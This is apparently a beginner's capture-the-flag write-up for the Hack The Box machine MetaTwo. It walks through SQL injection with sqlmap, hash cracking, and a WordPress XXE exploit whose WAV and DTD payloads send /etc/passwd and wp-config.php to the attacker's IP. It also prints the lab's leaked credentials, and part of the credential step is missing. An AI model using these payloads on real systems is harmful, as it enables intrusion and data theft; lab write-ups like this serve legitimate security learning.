Meta Two

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# Connection and nmap

First we connect to the openvpn that HTB provides us and spin the machine Then we will use nmap, as usual for enumeration:

sudo nmap -sC -sV -T4 10.10.11.186

The options are following: -sC: to use the default scripts -sV: probes the open ports for system information -T4: to define the aggressiveness of the scan

# First steps

We can gather that there are 3 open ports: 21 (ftp), 22 (ssh) and 80 (http).

The version of OpenSSH that is being used does not seem to be vulnerable but we can try other things such as connecting through ftp:

ftp 10.10.11.186

and trying to log as anonymous. This does not work.

So we are left with the http service which we know that is nginx/1.18.0 and the hostname is <http://metapress.htb/>.

We then have to go to /etc/hosts and append the ip and hostname using any text editor. This allows us to open the hostname in the browser without any problem.

Of course this is true for Linux (which you probably should be using), in Windows is a little more complicated and I struggled to be able to do this the first time. I tried to change the host file in System32, then flush the dns and nothing worked. Finally I simply installed firefox in WSL2 Kali and I use VcXsrv to view all GUI apps.

One way or another we should be able to browse the page now.

# Looking for vulnerabilities

We can look at the source code and it does not seem to be leaking any credentials but we can see it's a Wordpress site. We can play around with the forms and explore a little. Now we will use wpscan which is a command line tool for Wordpress security.

wpscan --url http://metapress.htb

# Enumerating databases: Sqlmap

Now we can use sqlmap, which is a tool for automating the process of detecting and exploiting SQL injection vulnerabilities. We can use it to identify the database management system, enumerate databases, tables and columns, extract the data and even run commands.

sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" --data="action=bookingpress\_front\_get\_category\_services&\_wpnonce=1b624223cc&category\_id=33&total\_service=1" -p "total\_service" --dbs

That way we can enumerate the databases present. I had problems with this command since it kept saying that the connection was not stable but i just kept trying and eventually I could do it.

The databases that we could found are two: blog and informationschema. The first one is the most interesting of the two, clearly.

sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" --data="action=bookingpress\_front\_get\_category\_services&\_wpnonce=1b624223cc&category\_id=33&total\_service=1" -D blog --tables

Now we look inside the blog database and enumerate the tables: there is a lot of them but the first that catches the eye is wpusers. After some horrible looking output we can see that it found two users, admin and manager. Along side the names we can see the hashes that correspond to the passwords, so we will copy them to a file and try to crack them.

# Cracking the passwords: John the Ripper

john password.txt --wordlist=/usr/share/wordlists/rockyou.txt

We are using John the Reaper which is a hashcracking program, in this case we are using the classic rockyou wordlist that. I had to decompress the rockyou file before utilizing the command, just so you know.

We see that it found one password, the manager's which is "partylikearockstar".

So we have a username and a password but we have to find out where to enter them. Although there is no login link in the page, based in our enumeration we know that there is a subdomain called "wp-admin". So if we go to <http://metapress.htb/wp-admin> we will encounter the Wordpress page for authentication, we enter the credentials and we are in!

# Exploiting XXE

Looking around the vulnerabilities of this version of Wordpress I encounter this article: <https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/> It's a fascinating thing. It essentially uses the metadata of a WAVE file to inject payload and retrieve information.

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.10.14.83:1234/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

That is the code that the author suggests, the only thing we should change it's the ip, replacing it with our own and I also changed the port to 1234 for convenience.

Now if we continue with the article we have to send this payload through a dtd file which will look like this:

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">  
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.10.14.83:1234/?p=%file;'>">

Again we have to modify the ip and port.

We will start a php server:

php -S 0.0.0.0:1234

And we go the the media page. Then click on add new and upload our payload.wav while the server is still running. We will get a huge, horrible looking output but we can decode it using:

echo -en <payload> | base64 -d

Now the output looks much more interesting since these is the passwd file of the machine we are trying to pawn. Of course if we analyze it there really is nothing we can do with this. But it is useful to know that the vulnerability can be exploited.

If we modify the evil.dtd file that we created before to give us the config file of the page we might be more lucky.

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/metapress.htb/blog/wp-config.php">  
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.10.14.83:1234/?p=%file;'>">

So we upload the payload.wav file again and again we decode the output which will look like this:

<?php  
/\*\* The name of the database for WordPress \*/  
define( 'DB\_NAME', 'blog' );  
  
/\*\* MySQL database username \*/  
define( 'DB\_USER', 'blog' );  
  
/\*\* MySQL database password \*/  
define( 'DB\_PASSWORD', '635Aq@TdqrCwXFUZ' );  
  
/\*\* MySQL hostname \*/  
define( 'DB\_HOST', 'localhost' );  
  
/\*\* Database Charset to use in creating database tables. \*/  
define( 'DB\_CHARSET', 'utf8mb4' );  
  
/\*\* The Database Collate type. Don't change this if in doubt. \*/  
define( 'DB\_COLLATE', '' );  
  
define( 'FS\_METHOD', 'ftpext' );  
define( 'FTP\_USER', 'metapress.htb' );  
define( 'FTP\_PASS', '9NYS\_ii@FyL\_p5M2NvJ' );  
define( 'FTP\_HOST', 'ftp.metapress.htb' );  
define( 'FTP\_BASE', 'blog/' );  
define( 'FTP\_SSL', false );  
  
/\*\*#@+  
 \* Authentication Unique Keys and Salts.  
 \* @since 2.6.0  
 \*/  
define( 'AUTH\_KEY', '?!Z$uGO\*A6xOE5x,pweP4i\*z;m`|.Z:X@)QRQFXkCRyl7}`rXVG=3 n>+3m?.B/:' );  
define( 'SECURE\_AUTH\_KEY', 'x$i$)b0]b1cup;47`YVua/JHq%\*8UA6g]0bwoEW:91EZ9h]rWlVq%IQ66pf{=]a%' );  
define( 'LOGGED\_IN\_KEY', 'J+mxCaP4z<g.6P^t`ziv>dd}EEi%48%JnRq^2MjFiitn#&n+HXv]||E+F~C{qKXy' );  
define( 'NONCE\_KEY', 'SmeDr$$O0ji;^9]\*`~GNe!pX@DvWb4m9Ed=Dd(.r-q{^z(F?)7mxNUg986tQO7O5' );  
define( 'AUTH\_SALT', '[;TBgc/,M#)d5f[H\*tg50ifT?Zv.5Wx=`l@v$-vH\*<~:0]s}d<&M;.,x0z~R>3!D' );  
define( 'SECURE\_AUTH\_SALT', '>`VAs6!G955dJs?$O4zm`.Q;amjW^uJrk\_1-dI(SjROdW[S&~omiH^jVC?2-I?I.' );  
define( 'LOGGED\_IN\_SALT', '4[fS^3!=%?HIopMpkgYboy8-jl^i]Mw}Y d~N=&^JsI`M)FJTJEVI) N#NOidIf=' );  
define( 'NONCE\_SALT', '.sU&CQ@IRlh O;5aslY+Fq8QWheSNxd6Ve#}w!Bq,h}V9jKSkTGsv%Y451F8L=bL' );  
  
/\*\*  
 \* WordPress Database Table prefix.  
 \*/  
$table\_prefix = 'wp\_';  
  
/\*\*  
 \* For developers: WordPress debugging mode.  
 \* @link https://wordpress.org/support/article/debugging-in-wordpress/  
 \*/  
define( 'WP\_DEBUG', false );  
  
/\*\* Absolute path to the WordPress directory. \*/  
if ( ! defined( 'ABSPATH' ) ) {  
 define( 'ABSPATH', \_\_DIR\_\_ . '/' );  
}  
  
/\*\* Sets up WordPress vars and included files. \*/  
require\_once ABSPATH . 'wp-settings.php';

There is a lot of hashes in there but the interesting thing is that we have a method: FTP, the user and the password (hashed). We already tried to connect to ftp and we couldn't so maybe this could prove useful.

# Getting the credentials

ftp 10.10.11.186

So we will do that:

ssh jnelson@metapress.htb

We input the password and we can see that it works! Now we can do an ls and find out that there is the user.txt file with the flag that we want.

# Escalating the privileges

If we try to use sudo we will see that we cannot. However we can see that there is a .passpie directory. Passpie is a password manager for Linux and there is a .keys file inside and a ssh directory. We don't really know if we can use this but it is worth a try.

So we will copy the private key block of the .keys file to our machine and write it to a file called key. And use gpg2john to write it to another file unhashed:

gpg2john key > pass\_hash

And run it through john again:

john --wordlist=/usr/share/wordlists/rockyou.txt pass\_hash

And once it is done:

john --wordlist=/usr/share/wordlists/rockyou.txt pass\_hash

Now we can see that the password is "blink182". We don't know what this is for but we can find out using:

passpie export pass

And entering "blink182" as the Passphrase. Now we can see that the root user has 'p7qfAZt4A1xo0x' as password.

So we will:

su root

#+beginquote nil#+endquote

And enter that as the password and we are in! We are root!

So let's end this, let's go to /root/root.txt and extract our flag from there.

And that is it! I hope this was informative, I am still a noob but I had a great time trying to crack this.

